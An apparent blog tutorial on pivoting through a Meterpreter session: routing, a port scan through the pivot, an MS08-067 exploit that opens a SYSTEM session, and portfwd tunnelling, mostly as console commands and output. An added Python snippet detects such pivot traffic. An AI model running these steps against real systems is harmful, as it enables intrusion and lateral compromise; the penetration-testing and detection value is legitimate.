Pivoting through a meterpreter session
So you’ve owned a box and now you want to exploit others using the first as a pivot.
The first thing to do is background your current meterpreter session:

```
meterpreter > background
msf exploit(multi_handler) > sessions -l

Active sessions
===============

  Id  Type                   Information                   Connection
  --  ----                   -----------                   ----------
  1   meterpreter x86/win32  XPSP0\Administrator @ XPSP0   81.142.243.100:21 -> 1.2.3.4:1050
```
Then add the pivot: route add [target network or ip] [netmask] [meterpreter session id]

```
msf exploit(ms08_067_netapi) > route add 1.2.3.4 255.255.255.0 1
msf exploit(ms08_067_netapi) > route print

Active Routing Table
====================

   Subnet   Netmask        Gateway
   ------   -------        -------
   1.2.3.4  255.255.255.0  Session 1

msf exploit(ms08_067_netapi) >
```
Now run a TCP scan through the pivot 🙂

```
msf exploit(ms08_067_netapi) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set RHOSTS 1.2.3.10
RHOSTS => 1.2.3.10
msf auxiliary(tcp) > run

[*] 1.2.3.10:139 - TCP OPEN
[*] 1.2.3.10:135 - TCP OPEN
[*] 1.2.3.10:445 - TCP OPEN
```
Then simply exploit the second box from the same Metasploit console:

```
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    1.2.3.10         yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LPORT     4444             yes       The listen port
   RHOST     1.2.3.10         no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 0 / 1 - lang:English
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes)
[*] Meterpreter session 2 opened (81.142.243.100-1.2.3.4:0 -> 1.2.3.5:4444) at 2011-06-20 10:56:13 +0100
```
To show the second session running through the first, list the sessions again:

```
meterpreter > background
msf exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

  Id  Type                   Information                    Connection
  --  ----                   -----------                    ----------
  1   meterpreter x86/win32  XPSP0\Administrator @ XPSP0    81.142.243.100:21 -> 1.2.3.4:1050
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ XPSP0C   81.142.243.100-1.2.3.4:0 -> 1.2.3.10:4444

msf exploit(ms08_067_netapi) >
```
Sweet!!!
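From the other side of the wire, the traffic this produces is distinctive: one box holds a connection with an outside address and then fans out to RPC/SMB ports on its neighbours. As an added example (not from the original post), here is a Python check that picks that pattern out of flow records; the records are constructed to mirror the sessions above, and the monitored subnet, port set and hit threshold are assumptions.

```python
"""Flag internal hosts that behave like a Metasploit pivot in flow records."""
from collections import defaultdict
from ipaddress import ip_address, ip_network

INTERNAL = ip_network("1.2.3.0/24")       # assumed: the subnet routed through session 1
PIVOT_PORTS = {135, 139, 445, 4444}       # RPC/SMB probed via the pivot, plus the bind port

# Constructed flow records (src, dst, dport) modelled on the sessions in the post.
SAMPLE_FLOWS = [
    ("81.142.243.100", "1.2.3.4", 1050),  # outside address -> first box (session 1)
    ("1.2.3.4", "1.2.3.10", 139),         # portscan module, relayed through session 1
    ("1.2.3.4", "1.2.3.10", 135),
    ("1.2.3.4", "1.2.3.10", 445),
    ("1.2.3.4", "1.2.3.10", 4444),        # bind_tcp stage for session 2
    ("1.2.3.10", "1.2.3.20", 80),         # ordinary web traffic, must not alert
]


def find_pivots(flows, internal=INTERNAL, ports=PIVOT_PORTS, min_hits=3):
    """Return {host: {"external_peers": [...], "internal_targets": [...]}} for
    internal hosts that both talk to an address outside the subnet and hit at
    least min_hits distinct (neighbour, port) pairs on the watched ports."""
    external_peers = defaultdict(set)     # internal host -> outside addresses it talks to
    internal_hits = defaultdict(set)      # internal host -> (neighbour, port) it probed
    for src, dst, dport in flows:
        s, d = ip_address(src), ip_address(dst)
        if s not in internal and d in internal:
            external_peers[dst].add(src)
        elif s in internal and d in internal and dport in ports:
            internal_hits[src].add((dst, dport))

    findings = {}
    for host, hits in internal_hits.items():
        if host in external_peers and len(hits) >= min_hits:
            findings[host] = {
                "external_peers": sorted(external_peers[host]),
                "internal_targets": sorted(hits),
            }
    return findings


if __name__ == "__main__":
    for host, info in find_pivots(SAMPLE_FLOWS).items():
        print(f"possible pivot {host}: outside peers {info['external_peers']}, "
              f"probed {info['internal_targets']}")
```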
UPDATE:
I forgot to mention the ability to port forward from within a meterpreter session.

Let's say that target2 (1.2.3.10) had SSH on it and you wanted to connect to it but couldn't do so directly. This is where the portfwd command comes in.

```
msf > sessions -i 1
meterpreter > portfwd add -l 44422 -p 22 -r 1.2.3.10
[*] Local TCP relay created: 0.0.0.0:44422 <-> 1.2.3.10:22
```
What the above does is map local TCP port 44422 on the attacker's box to TCP port 22 on 1.2.3.10. Note from the output that the relay binds to 0.0.0.0, i.e. every interface on your box, not just loopback. Now simply connect to target2 from a console using:

```
ssh -p 44422 127.0.0.1
```
The above applies to any service; simply map it to an unused local port (to save confusion, try to make the ports easy to recognise; I pad the port out with leading 4s).

```
remote:80   --> local:44480
remote:22   --> local:44422
remote:8080 --> local:48080
```